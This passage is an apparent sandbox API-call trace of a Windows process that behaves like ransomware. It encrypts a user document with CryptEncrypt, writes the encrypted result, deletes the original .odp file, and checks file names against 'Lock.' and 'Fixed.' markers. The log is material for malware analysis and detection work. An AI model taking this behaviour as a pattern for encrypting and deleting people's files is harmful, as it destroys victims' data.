lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.011] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7a39, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7a40) returned 1 [0222.011] CharLowerBuffW (in: lpsz="byte[31296]", cchLength=0xb | out: lpsz="byte[31296]") returned 0xb [0222.012] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.012] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.012] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x7a39, dwBufLen=0x7a40 | out: pbData=0x2aae878*, pdwDataLen=0x8cef60*=0x7a40) returned 1 [0222.014] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.014] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.014] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.014] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.014] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.014] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.016] WriteFile (in: hFile=0x4dc, lpBuffer=0x2ad4be0*, nNumberOfBytesToWrite=0x7a40, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ad4be0*, lpNumberOfBytesWritten=0x8cf5e4*=0x7a40, lpOverlapped=0x0) returned 1 [0222.018] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0222.018] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0222.018] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.018] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab848, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0222.018] CryptDestroyKey (hKey=0x9e2138) returned 1 [0222.018] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.018] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.018] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.018] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.018] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.018] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.018] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.018] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.019] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.019] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.019] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.019] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.019] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.019] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.019] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.019] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0222.020] CryptReleaseContext (hProv=0xa7bc48, dwFlags=0x0) returned 1 [0222.020] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.020] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.020] FreeLibrary (hLibModule=0x76390000) returned 1 [0222.020] CloseHandle (hObject=0x50c) returned 1 [0222.021] CloseHandle (hObject=0x4dc) returned 1 [0222.024] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.024] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.024] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/xocV7C6c.odp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\xocV7C6c.odp", lpFilePart=0x8cedf4*="xocV7C6c.odp") returned 0x26 [0222.024] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\xocV7C6c.odp" (normalized: "c:\\users\\fd1hvy\\documents\\xocv7c6c.odp")) returned 0x20 [0222.024] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\xocV7C6c.odp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92262400, ftCreationTime.dwHighDateTime=0x1d5cea0, ftLastAccessTime.dwLowDateTime=0xb656bcb0, ftLastAccessTime.dwHighDateTime=0x1d5d380, ftLastWriteTime.dwLowDateTime=0xb656bcb0, ftLastWriteTime.dwHighDateTime=0x1d5d380, nFileSizeHigh=0x0, nFileSizeLow=0x7a39, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="xocV7C6c.odp", cAlternateFileName="")) returned 0x9e2238 [0222.024] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\xocV7C6c.odp" (normalized: "c:\\users\\fd1hvy\\documents\\xocv7c6c.odp")) returned 1 [0222.026] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92262400, ftCreationTime.dwHighDateTime=0x1d5cea0, ftLastAccessTime.dwLowDateTime=0xb656bcb0, ftLastAccessTime.dwHighDateTime=0x1d5d380, ftLastWriteTime.dwLowDateTime=0xb656bcb0, ftLastWriteTime.dwHighDateTime=0x1d5d380, nFileSizeHigh=0x0, nFileSizeLow=0x7a39, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="xocV7C6c.odp", cAlternateFileName="")) returned 0 [0222.026] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0222.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854128 | out: hHeap=0x2af0000) returned 1 [0222.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.026] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0222.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0222.027] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0222.027] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854308 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0222.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4e) returned 0x29eabe0 [0222.029] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/xocV7C6c.odp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\xocV7C6c.odp", lpFilePart=0x8cf650*="xocV7C6c.odp") returned 0x26 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0222.029] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\xocV7C6c.odp" (normalized: "c:\\users\\fd1hvy\\documents\\xocv7c6c.odp")) returned 0xffffffff [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854308 | out: hHeap=0x2af0000) returned 1 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.029] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0222.029] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.029] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0222.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTyOBM6VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TyOBM6VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yOBM6VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OBM6VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VZ0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0222.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0222.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0222.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0222.030] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0222.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0222.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0222.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0222.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x22) returned 0x2a69790 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTyOBM6VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TyOBM6VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yOBM6VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OBM6VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VZ0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0222.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0222.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73370 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73370 | out: 